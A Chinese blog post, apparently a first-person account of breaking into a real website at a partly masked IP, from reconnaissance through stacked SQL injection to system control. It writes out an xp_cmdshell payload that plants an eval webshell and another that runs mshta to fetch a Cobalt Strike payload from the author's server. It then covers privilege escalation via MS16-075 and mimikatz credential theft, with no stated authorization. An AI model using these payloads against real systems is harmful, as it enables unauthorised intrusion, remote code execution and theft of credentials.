某网站测试

我得到的只有一个后台网址,首先也就是信息搜集了。在网络空间安全搜索引擎fofa上查询一下,再就是端口扫描 ,直接略过说有利用价值的端口:80,81,1433,3389
脆弱点:http://49.xxx.xx.xxx:81/Login/index
SQL注入post包(在响应包中得到ASP.NET+Microsoft-IIS/7.5)
权限:SA
在这里插入图片描述
刚开始得到注入就想着进入后台看看,然后肝了一段时间的py脚本,原谅我CAI
在这里插入图片描述
得到密码进入后台,模板千篇一律,无数据备份,无修改模板,上传个人判断基于白名单,有编辑器不过示例代码已删除,留言板不可留言,回过头来又看注入,既然是堆叠注入,那就可以执行SQL语句,然后一顿操作,嗯嗯嗯… 没有回显,代码如下:
在这里插入图片描述
以为到这里就结束了,没想到 3389端口登录失败,1433端口连接失败,这里我很懵,经过大佬的一番指导,堆叠注入是没有回显的,这时可ping以下dnslog,还好前几天补过:
在这里插入图片描述
既然dnslog有回显,那就证明xp_cmdshel扩展开启,可以执行命令,这里两种思路
第一种是cmd执行命令,输出到网站根目录
';exec master…xp_cmdshell ‘echo ^<%@ Page Language=“Jscript”%><%eval(Request.Item[“pass”],“unsafe”);%^> > c:\网站路径\shell.aspx’;–
由于我爆不出来绝对路径就采用了第二种方法

第二种是下载木马,运行木马直接上线
cs设置好监听器,生成一个html application文件,然后上传到cs服务器上
在注入点执行
'; exec master.dbo.xp_cmdshell ‘mshta http://39.xx.xxx.xxx:80/download/file.ext’; –
过一会儿有台主机上线了
在这里插入图片描述
设置好beacon回连时间,且不存在域
在这里插入图片描述
补丁安装200多,较多,把systeminfo中的信息漏洞对比,看有没有漏补的,发现可利用漏洞ms16-075
systeminfo | findstr KB3164038
https://github.com/vysecurity/reflectivepotato.git github上该exp的cna插件,加载到脚本管理器中
在这里插入图片描述
这里不应该直接创建管理员,应该mimikatz读取hash或者SSP获取明文密码,至此测试结束。

  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值